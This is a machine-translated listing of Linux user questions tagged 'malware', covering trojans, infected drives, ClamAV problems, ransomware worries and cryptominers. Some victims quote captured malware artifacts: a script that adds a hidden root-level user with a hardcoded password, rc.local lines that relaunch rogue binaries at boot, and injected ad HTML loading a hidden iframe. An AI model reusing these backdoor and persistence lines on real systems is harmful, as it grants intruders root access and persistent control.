Questions tagged «malware»

我最近偶然发现：Linux Trojan几乎被忽略了一年（虚幻IRCd） 是的，我知道从不受信任的来源添加一些随机的PPA /软件会带来麻烦（或更糟）。我从来没有这样做，但是有很多人这样做（许多Linux博客和小报都鼓励为新奇的应用程序添加PPA，而没有警告它可能会破坏您的系统甚至更糟，从而危及您的安全性。） 如何检测和删除特洛伊木马或流氓应用程序/脚本？

16 security  malware 

前一段时间，Ask Ubuntu上已经涵盖了相同（或相似）主题： Ubuntu 17.04 Chromium Browser悄悄地提供对Google帐户的完全访问权限 我刚刚执行了Ubuntu 16.04的全新清洁安装。令我惊讶的是，“ Ubuntu应用程序”仍在显示并且可以完全访问我的Google帐户。我不明白为什么，这很令人沮丧。这是什么？我没有给“ Ubuntu”这样的许可。 可能是一些恶意代码吗？这些恶意代码可能来自我安装的某些Chromium扩展程序，这些扩展程序在我启动并首次登录Chromium时会重新安装吗？ 我已经使用终端安装了Chromium： sudo apt-get install chromium-browser 屏幕截图：Google帐户->第三方应用-> Ubuntu 另外，Ubuntu URL是“ http：//”，而不是官方的“ https：//”。

16 google-chrome  chromium  malware 

在为我提供关于使用gparted保存文件并格式化驱动器的建议之前，请理解，我本可以花几个小时才能完成此操作，而这只需要几分钟。实际上，我想了解一下，这里到底发生了什么。这种情况正在浪费我多年来的所有经验。 我的印象是，如果我将受病毒感染的闪存驱动器插入我的Ubuntu计算机，我所要做的就是简单地删除病毒文件，我很高兴。 今天，我完全从Windows机器中收集了一些文件，这些文件位于Windows机器的NTFS格式化闪存驱动器中，完全知道该机器已感染病毒。当我将闪存驱动器插入计算机时，我发现确实已经收集了许多文件和文件夹。我已经删除了大多数。唯一显示出抗拒性的是RECYCLER目录（及其子目录）。 该目录的属性。 drwx------ 1 masroor masroor 4.0K May 7 16:01 RECYCLER/ 如果我执行rm命令 sudo rm -rvf RECYCLER/ 我得到了很长的输出 rm: cannot remove `RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/OagFrAIX.exe': Input/output error rm: cannot remove `RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/viJbcvrJ.cpl': Input/output error <rest snipped> 有趣的是，以上报告的文件由ls命令显示，并带有许多属性。 ls -l RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/ ls: cannot access RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/OagFrAIX.exe: Input/output error ls: cannot access RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/viJbcvrJ.cpl: Input/output error total …

15 windows  usb-drive  ntfs  malware  ntfs-3g 

我尝试通过运行来更新ClamAV数据库freshclam。在daily-*.cdiff成功下载，但随后的进程挂起。CPU已达到100％的最大值，但是更新将无法完成。我在Appr之后用Ctrl+ 取消了该过程C。10分钟。这是我的更新尝试的输出： # freshclam ClamAV update process started at Tue Nov 8 00:15:57 2016 main.cvd is up to date (version: 57, sigs: 4218790, f-level: 60, builder: amishhammer) Downloading daily-22474.cdiff [100%] 还有其他人观察到这种行为吗？是错误还是我的系统配置不正确？ PS：我ClamAV v0.99.2在Ubuntu Mate 16.04上使用。

15 16.04  updates  malware  antivirus  clamav 

我刚刚浏览了一个被标记为“攻击站点”或包含恶意软件的站点，但是Firefox在我进入之前没有发出警告。只有当我使用站点中的另一页打开新选项卡时，它才会阻止该页面。 由于我认为没有适用于Ubuntu的反恶意软件，我该如何检查系统上的漏洞？如果有，请告诉。 谢谢！

14 security  malware 

最近，我注意到我的家庭服务器变得非常缓慢。所有资源都被两个过程消耗掉了：crond64和tsm。即使我一再杀了他们，他们仍然不断出现。 同时，我的ISP通知我有关我的IP地址引起的滥用： ==================== Excerpt from log for 178.22.105.xxx==================== Note: Local timezone is +0100 (CET) Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from …

14 malware  antivirus 

因此，当我遇到使用sudo获取管理员特权的建议时，我正在尝试在wine中安装一些东西。那是我收到以上消息的时候 ~/.wine is not owned by you 通过阅读，我很快意识到为什么出现此消息，并且尝试sudo喝酒是一个非常糟糕的想法。 所以我什么也没做，也不想再sudo喝酒了。我的问题是，因为我收到了此封锁，我安全吗？还是我需要删除所有的酒？

12 wine  sudo  security  malware 

我相当确定我的Ubuntu 13.10笔记本电脑感染了某种恶意软件。 每隔一段时间，我会发现一个进程/ lib / sshd（由root拥有）正在运行并消耗大量cpu。不是运行/ usr / sbin / sshd的sshd服务器。 二进制文件具有--wxrw-rwt权限，并且在/ lib目录中生成并生成脚本。最近的一个名为13959730401387633604，它执行以下操作 #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusr用户是由恶意软件独立创建的，然后chpasswd挂起，而占用了100％的cpu。 到目前为止，我已经确定gusr用户已另外添加到/ etc /中的文件中。 /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid 似乎该恶意软件使用“-”后缀复制了所有这些文件。由root修改的/ etc /文件的完整列表在此处。 此外，/ etc / hosts文件已更改为this。 / lib / sshd首先将自身添加到/etc/init.d/rc.local文件的末尾！ …

12 security  malware 

我登录了Gmail，并收到了一封来自亚马逊的电子邮件，内容是对最近的订单进行评分。我没有认出这家公司，但决定打开这封电子邮件，然后立即发现它不是来自亚马逊的，看起来像是一封“坏”电子邮件，里面有很多随机物品，有人试图利用它。 我在16.04。我总是读到Ubuntu是相当安全的，因为一切都需要root。是否应该运行任何软件以确保现在系统上没有任何东西，或者应该采取任何措施确保我的安全？我通常对电子邮件保持谨慎，但是这让我受益匪浅。

10 security  malware 

已关闭。这个问题需要更加集中。它当前不接受答案。 想改善这个问题吗？更新问题，使其仅通过编辑此帖子来关注一个问题。 3年前关闭。 Ubuntu中使用哪种文件格式来制造病毒？例如，大多数Windows病毒都是以.exe格式编写的，但是我无法确定Ubuntu中的常用格式。

9 malware 

编辑：这与建议的重复项不同。建议的重复内容通常与病毒和防病毒有关。这个问题专门涉及加密勒索软件，它如何运行以及是否会影响加密文件夹。 如今，恶意软件似乎正在感染Windows计算机，违背其意愿对其数据进行加密，并要求比特币赎金以换取加密密钥。 我想可能没有人会为Linux编写勒索软件，但可以说有人这样做： 为了使这样的软件在Ubuntu机器上“成功”运行，用户是否必须首先运行它并提供sudo密码？如果没有用户这样做，Ubuntu上会有这样的威胁吗？ 如果用户文件已经被加密，那可以防止这种情况发生吗？如果勒索软件程序被用户（还用sudo密码确认）不知不觉地安装了，甚至可以将您预先加密的数据劫为人质？ 总的来说，Ubuntu对加密勒索软件有多大的脆弱性？用户的行为要多么粗心/不明智才能真正将其数据劫为人质？

9 malware 

无论我打开哪个网站，都会出现一个弹出广告框。尝试重置设置，禁用扩展程序，删除chrome上的所有用户。 看来这与chrome无关，因为Firefox上也发生了同样的事情，而我之前从未打开过。 我怀疑这可能与我最近添加的某些存储库有关，即使这样做怎么办？ 让我描述一下弹出窗口，因为我没有足够的声誉，所以无法上传图片。它放置在页面的中间而不是很大。不会随着页面的其余部分移动，而是在滚动页面时停留。有时里面有谷歌广告。AdBlock会阻止内容，但不会阻止弹出窗口本身。 检查元素的结果： <div id="thisisonesplashforclicktocloseidhere" style= "position:fixed;z-index:999900;top:50%;left:50%;margin-top:-125px;margin-left:-150px;width:300px;height:250px;background-color:#fff;border:4px solid #444;-moz-box-shadow:0 0 12px 4px #888;-webkit-box-shadow:0 0 12px 4px #888;box-shadow:0 0 12px 4px #888;-webkit-border-radius:4px;border-radius:4px;"> <iframe frameborder="0" height="0" scrolling="no" src= "http://guzelyemek.com/reklam.html?gads_300x250" style= "display: none !important; visibility: hidden !important; opacity: 0 !important;" width="0"></iframe><a href="javascript:hideADSnow()" id="clickonME" style= "position:absolute;top:-8px;right:-7px;display:block;width:29px;height:29px;background:transparent url(http://3.bp.blogspot.com/-2pNyEIhTbiU/UWJ-FMsZktI/AAAAAAAAUKg/3FPcPp0CNko/s1600/close-button.png) no-repeat top left;"></a> chrome://plugins： 注意：使用AdBlock …

9 14.04  malware  rootkit  popup-ads 

当我开始使用Linux并研究Linux系统的文件结构和访问权限时，我想到的想法是，只要您仅在特权或限制较少的帐户内运行，就不会感染任何病毒或恶意软件您的帐户，将影响整个系统。“设置”也不会影响已安装的各种应用程序，因为设置和保存的文档都全部存储在您的帐户中...或者，我是否对此感到误解？ 关于这一点，我对Ubuntu中的“ sudo”命令感到担忧。如果我曾经通过终端使用特权帐户的sudo从一个没有特权但受感染的用户或来宾帐户内部使用，受感染用户的主文件夹中的恶意软件是否仍会渗透到整个系统，并使我的Ubuntu系统受到感染？ 另外，在Windows Emulator中，Wine ...我注意到我安装的应用程序不是系统范围的，而是本地化到安装时使用的帐户中。不幸的是，葡萄酒应用程序吸引了恶意软件。在一周内，ClamTK已检测到700多种威胁。我应该担心这些威胁消失并感染整个系统吗？ 在此先感谢那些可以阐明这一点的人。

8 permissions  login  security  malware 

有人知道sapd，skysapd，sksapd，ksapd做什么吗？他们是病毒吗？我尝试了clamav，但并未将其识别为病毒。 我还意识到我的/etc/rc.local具有多个副本： nohup /etc/cupsdd > /dev/null 2>&1& cd /etc;./ksapd cd /etc;./kysapd cd /etc;./atdd

3 security  malware 

因此，似乎我们的VPS被黑客入侵了，我注意到网站运行缓慢，因此我使用htop检查了进程。目前有各种各样的cpuminer，使处理器的使用率接近100％。我认为黑客是由于常用CMS的安装过时造成的。进程具有所有者www-data。 是否有可能摆脱这种情况？clamav会感染病毒吗？还是需要进行全新安装？

malware  antivirus  clamav